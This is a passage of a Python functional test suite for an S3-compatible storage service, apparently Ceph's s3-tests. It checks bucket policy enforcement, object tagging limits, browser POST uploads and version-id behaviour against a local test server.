resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
response = alt_client.list_objects(Bucket=bucket_name)
eq(len(response['Contents']), 1)
@attr('bucket-policy')
@attr('list-objects-v2')
def test_bucketv2_policy():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
response = alt_client.list_objects_v2(Bucket=bucket_name)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy and ACL')
@attr(assertion='fails')
@attr('bucket-policy')
def test_bucket_policy_acl():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Deny",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_acl(Bucket=bucket_name, ACL='authenticated-read')
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
e = assert_raises(ClientError, alt_client.list_objects, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
client.delete_bucket_policy(Bucket=bucket_name)
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy and ACL with list-objects-v2')
@attr(assertion='fails')
@attr('bucket-policy')
@attr('list-objects-v2')
def test_bucketv2_policy_acl():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Deny",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_acl(Bucket=bucket_name, ACL='authenticated-read')
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
e = assert_raises(ClientError, alt_client.list_objects_v2, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
client.delete_bucket_policy(Bucket=bucket_name)
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy for a user belonging to a different tenant')
@attr(assertion='succeeds')
@attr('bucket-policy')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_policy_different_tenant():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3::*:" + bucket_name
resource2 = "arn:aws:s3::*:" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
# TODO: figure out how to change the bucketname
def change_bucket_name(**kwargs):
kwargs['params']['url'] = "http://localhost:8000/:{bucket_name}?encoding-type=url".format(bucket_name=bucket_name)
kwargs['params']['url_path'] = "/:{bucket_name}".format(bucket_name=bucket_name)
kwargs['params']['context']['signing']['bucket'] = ":{bucket_name}".format(bucket_name=bucket_name)
print(kwargs['request_signer'])
print(kwargs)
#bucket_name = ":" + bucket_name
tenant_client = get_tenant_client()
tenant_client.meta.events.register('before-call.s3.ListObjects', change_bucket_name)
response = tenant_client.list_objects(Bucket=bucket_name)
#alt_client = get_alt_client()
#response = alt_client.list_objects(Bucket=bucket_name)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy for a user belonging to a different tenant')
@attr(assertion='succeeds')
@attr('bucket-policy')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
@attr('list-objects-v2')
def test_bucketv2_policy_different_tenant():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3::*:" + bucket_name
resource2 = "arn:aws:s3::*:" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
# TODO: figure out how to change the bucketname
def change_bucket_name(**kwargs):
kwargs['params']['url'] = "http://localhost:8000/:{bucket_name}?encoding-type=url".format(bucket_name=bucket_name)
kwargs['params']['url_path'] = "/:{bucket_name}".format(bucket_name=bucket_name)
kwargs['params']['context']['signing']['bucket'] = ":{bucket_name}".format(bucket_name=bucket_name)
print(kwargs['request_signer'])
print(kwargs)
#bucket_name = ":" + bucket_name
tenant_client = get_tenant_client()
tenant_client.meta.events.register('before-call.s3.ListObjects', change_bucket_name)
response = tenant_client.list_objects_v2(Bucket=bucket_name)
#alt_client = get_alt_client()
#response = alt_client.list_objects_v2(Bucket=bucket_name)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy on another bucket')
@attr(assertion='succeeds')
@attr('bucket-policy')
def test_bucket_policy_another_bucket():
bucket_name = get_new_bucket()
bucket_name2 = get_new_bucket()
client = get_client()
key = 'asdf'
key2 = 'abcd'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
client.put_object(Bucket=bucket_name2, Key=key2, Body='abcd')
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"arn:aws:s3:::*",
"arn:aws:s3:::*/*"
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
response = client.get_bucket_policy(Bucket=bucket_name)
response_policy = response['Policy']
client.put_bucket_policy(Bucket=bucket_name2, Policy=response_policy)
alt_client = get_alt_client()
response = alt_client.list_objects(Bucket=bucket_name)
eq(len(response['Contents']), 1)
alt_client = get_alt_client()
response = alt_client.list_objects(Bucket=bucket_name2)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy on another bucket with list-objects-v2')
@attr(assertion='succeeds')
@attr('bucket-policy')
@attr('list-objects-v2')
def test_bucketv2_policy_another_bucket():
bucket_name = get_new_bucket()
bucket_name2 = get_new_bucket()
client = get_client()
key = 'asdf'
key2 = 'abcd'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
client.put_object(Bucket=bucket_name2, Key=key2, Body='abcd')
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"arn:aws:s3:::*",
"arn:aws:s3:::*/*"
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
response = client.get_bucket_policy(Bucket=bucket_name)
response_policy = response['Policy']
client.put_bucket_policy(Bucket=bucket_name2, Policy=response_policy)
alt_client = get_alt_client()
response = alt_client.list_objects_v2(Bucket=bucket_name)
eq(len(response['Contents']), 1)
alt_client = get_alt_client()
response = alt_client.list_objects_v2(Bucket=bucket_name2)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put condition operator end with ifExists')
@attr('bucket-policy')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_policy_set_condition_operator_end_with_IfExists():
bucket_name = get_new_bucket()
client = get_client()
key = 'foo'
client.put_object(Bucket=bucket_name, Key=key)
policy = '''{
"Version":"2012-10-17",
"Statement": [{
"Sid": "Allow Public Access to All Objects",
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Condition": {
"StringLikeIfExists": {
"aws:Referer": "http://www.example.com/*"
}
},
"Resource": "arn:aws:s3:::%s/*"
}
]
}''' % bucket_name
boto3.set_stream_logger(name='botocore')
client.put_bucket_policy(Bucket=bucket_name, Policy=policy)
request_headers={'referer': 'http://www.example.com/'}
lf = (lambda **kwargs: kwargs['params']['headers'].update(request_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
request_headers={'referer': 'http://www.example.com/index.html'}
lf = (lambda **kwargs: kwargs['params']['headers'].update(request_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# the 'referer' headers need to be removed for this one
#response = client.get_object(Bucket=bucket_name, Key=key)
#eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
request_headers={'referer': 'http://example.com'}
lf = (lambda **kwargs: kwargs['params']['headers'].update(request_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
# TODO: Compare Requests sent in Boto3, Wireshark, RGW Log for both boto and boto3
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
response = client.get_bucket_policy(Bucket=bucket_name)
print(response)
def _create_simple_tagset(count):
tagset = []
for i in range(count):
tagset.append({'Key': str(i), 'Value': str(i)})
return {'TagSet': tagset}
def _make_random_string(size):
return ''.join(random.choice(string.ascii_letters) for _ in range(size))
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Get/PutObjTagging output')
@attr(assertion='success')
@attr('tagging')
def test_get_obj_tagging():
key = 'testputtags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
input_tagset = _create_simple_tagset(2)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='Test HEAD obj tagging output')
@attr(assertion='success')
@attr('tagging')
def test_get_obj_head_tagging():
key = 'testputtags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
count = 2
input_tagset = _create_simple_tagset(count)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(response['ResponseMetadata']['HTTPHeaders']['x-amz-tagging-count'], str(count))
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Put max allowed tags')
@attr(assertion='success')
@attr('tagging')
def test_put_max_tags():
key = 'testputmaxtags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
input_tagset = _create_simple_tagset(10)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Put more than the max allowed tags')
@attr(assertion='fails')
@attr('tagging')
def test_put_excess_tags():
key = 'testputmaxtags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
input_tagset = _create_simple_tagset(11)
e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidTag')
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Put max allowed k-v size')
@attr(assertion='success')
@attr('tagging')
def test_put_max_kvsize_tags():
key = 'testputmaxkeysize'
bucket_name = _create_key_with_random_content(key)
client = get_client()
tagset = []
for i in range(10):
k = _make_random_string(128)
v = _make_random_string(256)
tagset.append({'Key': k, 'Value': v})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
for kv_pair in response['TagSet']:
eq((kv_pair in input_tagset['TagSet']), True)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test exceed key size')
@attr(assertion='fails')
@attr('tagging')
def test_put_excess_key_tags():
key = 'testputexcesskeytags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
tagset = []
for i in range(10):
k = _make_random_string(129)
v = _make_random_string(256)
tagset.append({'Key': k, 'Value': v})
input_tagset = {'TagSet': tagset}
e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidTag')
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test exceed val size')
@attr(assertion='fails')
@attr('tagging')
def test_put_excess_val_tags():
key = 'testputexcesskeytags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
tagset = []
for i in range(10):
k = _make_random_string(128)
v = _make_random_string(257)
tagset.append({'Key': k, 'Value': v})
input_tagset = {'TagSet': tagset}
e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidTag')
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test PUT modifies existing tags')
@attr(assertion='success')
@attr('tagging')
def test_put_modify_tags():
key = 'testputmodifytags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
tagset = []
tagset.append({'Key': 'key', 'Value': 'val'})
tagset.append({'Key': 'key2', 'Value': 'val2'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
tagset2 = []
tagset2.append({'Key': 'key3', 'Value': 'val3'})
input_tagset2 = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset2)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset2['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Delete tags')
@attr(assertion='success')
@attr('tagging')
def test_put_delete_tags():
key = 'testputmodifytags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
input_tagset = _create_simple_tagset(2)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
response = client.delete_object_tagging(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='post')
@attr(operation='anonymous browser based upload via POST request')
@attr('tagging')
@attr(assertion='succeeds and returns written data')
def test_post_object_tags_anonymous_request():
bucket_name = get_new_bucket_name()
client = get_client()
url = _get_post_url(bucket_name)
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
key_name = "foo.txt"
input_tagset = _create_simple_tagset(2)
    # xml_input_tagset is the same as input_tagset expressed as XML.
    # There is no simple way to convert input_tagset to XML like there was in
    # the boto2 tests; see the illustrative helper after this test.
xml_input_tagset = "<Tagging><TagSet><Tag><Key>0</Key><Value>0</Value></Tag><Tag><Key>1</Key><Value>1</Value></Tag></TagSet></Tagging>"
payload = OrderedDict([
("key" , key_name),
("acl" , "public-read"),
("Content-Type" , "text/plain"),
("tagging", xml_input_tagset),
('file', ('bar')),
])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key=key_name)
body = _get_body(response)
eq(body, 'bar')
response = client.get_object_tagging(Bucket=bucket_name, Key=key_name)
eq(response['TagSet'], input_tagset['TagSet'])
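# A minimal sketch of how the hand-written Tagging XML used by the POST tests
# could be built from a tagset dict (illustrative only; assumes the simple
# Key/Value structure produced by _create_simple_tagset):
def _tagset_to_xml_example(tagset):
    import xml.etree.ElementTree as ET

    tagging = ET.Element('Tagging')
    tag_set = ET.SubElement(tagging, 'TagSet')
    for tag in tagset['TagSet']:
        tag_elem = ET.SubElement(tag_set, 'Tag')
        ET.SubElement(tag_elem, 'Key').text = tag['Key']
        ET.SubElement(tag_elem, 'Value').text = tag['Value']
    return ET.tostring(tagging, encoding='unicode')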
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr('tagging')
@attr(assertion='succeeds and returns written data')
def test_post_object_tags_authenticated_request():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [
{"bucket": bucket_name},
["starts-with", "$key", "foo"],
{"acl": "private"},
["starts-with", "$Content-Type", "text/plain"],
["content-length-range", 0, 1024],
["starts-with", "$tagging", ""]
]}
# xml_input_tagset is the same as `input_tagset = _create_simple_tagset(2)` in xml
    # There is no simple way to convert input_tagset to XML here like there is in the boto2 tests
    # (see the sketch after test_post_object_tags_anonymous_request for one way to generate it).
xml_input_tagset = "<Tagging><TagSet><Tag><Key>0</Key><Value>0</Value></Tag><Tag><Key>1</Key><Value>1</Value></Tag></TagSet></Tagging>"
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
    payload = OrderedDict([
        ("key", "foo.txt"),
        ("AWSAccessKeyId", aws_access_key_id),
        ("acl", "private"),
        ("signature", signature),
        ("policy", policy),
        ("tagging", xml_input_tagset),
        ("Content-Type", "text/plain"),
        ('file', ('bar')),
    ])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='Test PutObj with tagging headers')
@attr(assertion='success')
@attr('tagging')
def test_put_obj_with_tags():
bucket_name = get_new_bucket()
client = get_client()
key = 'testtagobj1'
data = 'A'*100
tagset = []
tagset.append({'Key': 'bar', 'Value': ''})
tagset.append({'Key': 'foo', 'Value': 'bar'})
put_obj_tag_headers = {
'x-amz-tagging' : 'foo=bar&bar'
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(put_obj_tag_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, data)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
response_tagset = response['TagSet']
eq(response_tagset, tagset)
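# For reference only: boto3's put_object also accepts a Tagging parameter (a
# URL-encoded "key=value&key2=value2" string), so tags equivalent to the
# x-amz-tagging header injected above could be attached without the before-call
# hook. This hypothetical helper is a sketch and is not called by any test here.
def _put_obj_with_tagging_param(client, bucket_name, key, body, tagging):
    # e.g. tagging='foo=bar&bar=' for the same tag set as the header above
    return client.put_object(Bucket=bucket_name, Key=key, Body=body, Tagging=tagging)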
def _make_arn_resource(path="*"):
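    # e.g. _make_arn_resource("mybucket/*") -> "arn:aws:s3:::mybucket/*", the
    # Resource string format used by the bucket policies below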
return "arn:aws:s3:::{}".format(path)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test GetObjTagging public read')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_get_tags_acl_public():
key = 'testputtagsacl'
bucket_name = _create_key_with_random_content(key)
client = get_client()
resource = _make_arn_resource("{}/{}".format(bucket_name, key))
policy_document = make_json_policy("s3:GetObjectTagging",
resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
input_tagset = _create_simple_tagset(10)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='Test PutObjTagging public write')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_put_tags_acl_public():
key = 'testputtagsacl'
bucket_name = _create_key_with_random_content(key)
client = get_client()
resource = _make_arn_resource("{}/{}".format(bucket_name, key))
policy_document = make_json_policy("s3:PutObjectTagging",
resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
input_tagset = _create_simple_tagset(10)
alt_client = get_alt_client()
response = alt_client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='test deleteobjtagging public')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_delete_tags_obj_public():
key = 'testputtagsacl'
bucket_name = _create_key_with_random_content(key)
client = get_client()
resource = _make_arn_resource("{}/{}".format(bucket_name, key))
policy_document = make_json_policy("s3:DeleteObjectTagging",
resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
input_tagset = _create_simple_tagset(10)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.delete_object_tagging(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='put')
@attr(operation='test whether a correct version-id returned')
@attr(assertion='version-id is same as bucket list')
@attr('versioning')
def test_versioning_bucket_atomic_upload_return_version_id():
bucket_name = get_new_bucket()
client = get_client()
key = 'bar'
    # for a versioning-enabled bucket, a non-empty version-id should be returned
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
response = client.put_object(Bucket=bucket_name, Key=key)
version_id = response['VersionId']
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
for version in versions:
eq(version['VersionId'], version_id)
    # for a versioning-default bucket, no version-id should be returned.
bucket_name = get_new_bucket()
key = 'baz'
response = client.put_object(Bucket=bucket_name, Key=key)
eq(('VersionId' in response), False)
    # for a versioning-suspended bucket, no version-id should be returned.
bucket_name = get_new_bucket()
key = 'baz'
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
response = client.put_object(Bucket=bucket_name, Key=key)
eq(('VersionId' in response), False)
@attr(resource='object')
@attr(method='put')
@attr(operation='test whether a correct version-id returned')
@attr(assertion='version-id is same as bucket list')
@attr('versioning')
def test_versioning_bucket_multipart_upload_return_version_id():
content_type='text/bla'
objlen = 30 * 1024 * 1024
bucket_name = get_new_bucket()
client = get_client()
key = 'bar'
metadata={'foo': 'baz'}
    # for a versioning-enabled bucket, a non-empty version-id should be returned
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, client=client, content_type=content_type, metadata=metadata)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
version_id = response['VersionId']
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
for version in versions:
eq(version['VersionId'], version_id)
    # for a versioning-default bucket, no version-id should be returned.
bucket_name = get_new_bucket()
key = 'baz'
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, client=client, content_type=content_type, metadata=metadata)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
eq(('VersionId' in response), False)
    # for a versioning-suspended bucket, no version-id should be returned
bucket_name = get_new_bucket()
key = 'foo'
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, client=client, content_type=content_type, metadata=metadata)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
eq(('VersionId' in response), False)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test ExistingObjectTag conditional on get object')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_get_obj_existing_tag():
bucket_name = _create_objects(keys=['publictag', 'privatetag', 'invalidtag'])
client = get_client()
tag_conditional = {"StringEquals": {
"s3:ExistingObjectTag/security" : "public"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObject",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
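    # The policy document built above presumably has roughly this shape (the exact
    # output of make_json_policy is defined elsewhere in this file); the Condition
    # block is what limits GetObject to objects tagged security=public:
    #   {"Version": "2012-10-17",
    #    "Statement": [{"Effect": "Allow",
    #                   "Principal": {"AWS": "*"},
    #                   "Action": "s3:GetObject",
    #                   "Resource": "arn:aws:s3:::<bucket>/*",
    #                   "Condition": {"StringEquals":
    #                                 {"s3:ExistingObjectTag/security": "public"}}}]}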
tagset = []
tagset.append({'Key': 'security', 'Value': 'public'})
tagset.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset2 = []
tagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset3 = []
tagset3.append({'Key': 'security1', 'Value': 'public'})
input_tagset = {'TagSet': tagset3}
response = client.put_object_tagging(Bucket=bucket_name, Key='invalidtag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key='publictag')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
e = assert_raises(ClientError, alt_client.get_object, Bucket=bucket_name, Key='privatetag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object, Bucket=bucket_name, Key='invalidtag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test ExistingObjectTag conditional on get object tagging')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_get_obj_tagging_existing_tag():
bucket_name = _create_objects(keys=['publictag', 'privatetag', 'invalidtag'])
client = get_client()
tag_conditional = {"StringEquals": {
"s3:ExistingObjectTag/security" : "public"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObjectTagging",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
tagset = []
tagset.append({'Key': 'security', 'Value': 'public'})
tagset.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset2 = []
tagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset3 = []
tagset3.append({'Key': 'security1', 'Value': 'public'})
input_tagset = {'TagSet': tagset3}
response = client.put_object_tagging(Bucket=bucket_name, Key='invalidtag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
